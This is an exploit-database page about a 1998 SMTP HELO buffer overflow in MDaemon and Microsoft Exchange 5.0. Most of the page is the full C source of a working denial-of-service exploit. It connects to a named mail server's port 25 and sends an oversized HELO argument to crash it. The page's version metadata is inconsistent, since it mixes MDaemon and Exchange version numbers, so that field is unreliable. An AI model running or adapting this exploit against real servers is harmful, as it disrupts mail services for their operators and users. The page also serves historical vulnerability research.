header-logo
Suggest Exploit
vendor:
Exchange Server
by:
Rootshell
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Exchange Server
Affected Version From: Microsoft Exchange 5.0
Affected Version To: Microsoft Exchange 2.71 SP1
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:exchange_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
1998

Microsoft Exchange Server SMTP HELO Command Argument Buffer Overflow Vulnerability

It has been reported that Microsoft Exchange server is prone to an SMTP HELO command argument buffer overflow vulnerability. The issue presents itself likely due to insufficient bounds checking performed when handling malicious SMTP HELO command arguments of excessive length. It has been reported that a remote attacker may exploit this condition to trigger a denial of service in the affected daemon.

Mitigation:

Apply the latest security patches and updates to the affected system.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/8555/info

It has been reported that Microsoft Exchange server is prone to an SMTP HELO command argument buffer overflow vulnerability.

The issue presents itself likely due to insufficient bounds checking performed when handling malicious SMTP HELO command arguments of excessive length. It has been reported that a remote attacker may exploit this condition to trigger a denial of service in the affected daemon. 

/* 
 * MDaemon SMTP server for Windows buffer overflow exploit 
 * 
 * http://www.mdaemon.com - if you dare... 
 * 
 * Tested on MDaemon 2.71 SP1 
 * 
 * http://www.rootshell.com/ 
 * 
 * Released 3/10/98 
 * 
 * (C) 1998 Rootshell All Rights Reserved 
 * 
 * For educational use only. Distribute freely. 
 * 
 * Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail 
 * connector if SP2 has NOT been installed. 
 * 
 * Danger! 
 * 
 * A malicous user could use this bug to execute arbitrary code on the 
 * remote system. 
 * 
 */ 


#include <stdio.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <netdb.h> 
#include <string.h> 
#include <stdlib.h> 
#include <unistd.h> 


void main(int argc, char *argv[]) 
{ 
  struct sockaddr_in sin; 
  struct hostent *hp; 
  char *buffer; 
  int sock, i; 


  if (argc != 2) { 
    printf("usage: %s <smtp server>\n", argv[0]); 
    exit(1); 
  } 
  hp = gethostbyname(argv[1]); 
  if (hp==NULL) { 
    printf("Unknown host: %s\n",argv[1]); 
    exit(1); 
  } 
  bzero((char*) &sin, sizeof(sin)); 
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); 
  sin.sin_family = hp->h_addrtype; 
  sin.sin_port = htons(25); 
  sock = socket(AF_INET, SOCK_STREAM, 0); 
  connect(sock,(struct sockaddr *) &sin, sizeof(sin)); 
  buffer = (char *)malloc(10000); 
  sprintf(buffer, "HELO "); 
  for (i = 0; i<4096; i++) 
    strcat(buffer, "x"); 
  strcat(buffer, "\r\n"); 
  write(sock, &buffer[0], strlen(buffer)); 
  close(sock); 
  free(buffer); 
}